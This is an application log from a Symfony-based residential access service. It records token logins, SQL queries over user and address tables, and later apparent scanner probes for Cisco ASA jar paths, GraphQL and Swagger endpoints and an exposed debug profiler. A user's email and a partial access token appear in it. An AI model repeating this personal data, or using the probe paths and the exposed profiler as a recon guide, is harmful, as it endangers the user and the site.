[2025-12-16 15:22:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["3bb871acc2d065474990463a1c [...]"] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
[2025-12-16 15:22:52] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"shiba.74@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [410,270,1] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [270,1] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [270,1] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [394] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
[2025-12-16 15:22:52] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 15:22:52] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-16 15:22:52] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 15:22:52] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["3bb871acc2d065474990463a1c [...]"] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [410] []
[2025-12-16 15:22:52] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"shiba.74@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["f2f23f0d-85c6-44c9-b07a-59 [...]"] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [410,1] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [410,1] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["a41ce4c3-29d5-4f1f-9146-ae [...]"] []
[2025-12-16 15:22:52] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [410,270] []
[2025-12-16 15:22:52] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 15:32:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 15:32:31] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"d72ea8","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/d72ea8","method":"GET"} []
[2025-12-16 15:38:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 15:39:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=twig","method":"GET"} []
[2025-12-16 15:39:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-16 15:39:52] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-16 15:40:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=cache","method":"GET"} []
[2025-12-16 15:40:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-16 15:42:45] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"092da8","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/092da8/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-16 15:42:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-16 15:45:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c5960","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c5960?panel=time","method":"GET"} []
[2025-12-16 15:45:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 15:47:36] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9fab17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9fab17?panel=events","method":"GET"} []
[2025-12-16 15:47:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-16 15:54:19] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 15:55:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 15:55:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 16:00:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=109.199.118.129&limit=10","method":"GET"} []
[2025-12-16 16:00:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=109.199.118.129&limit=10","method":"GET"} []
[2025-12-16 16:01:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 16:01:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8599e8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8599e8?panel=time","method":"GET"} []
[2025-12-16 16:01:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 16:12:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"48c5ed","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/48c5ed?panel=dump","method":"GET"} []
[2025-12-16 16:12:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-16 16:20:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"HEAD"} []
[2025-12-16 16:20:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"35e76f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/35e76f?panel=exception","method":"GET"} []
[2025-12-16 16:20:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-16 16:29:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0b9d80","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0b9d80","method":"GET"} []
[2025-12-16 16:29:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-16 16:43:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1db3bc","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/1db3bc?panel=logger","method":"GET"} []
[2025-12-16 16:43:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-16 17:00:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0c86f8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0c86f8?panel=time","method":"GET"} []
[2025-12-16 17:00:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-16 17:01:06] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 17:01:06] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-16 17:01:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql/api"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql/api\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:09] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /api/gql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /api/gql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:11] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /swagger/swagger-ui.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /swagger/swagger-ui.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webjars/swagger-ui/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webjars/swagger-ui/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 17:01:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 17:01:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 17:01:14] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:01:14] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 17:01:14] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-16 17:01:14] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-16 17:01:14] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-16 17:01:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-16 17:01:14] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
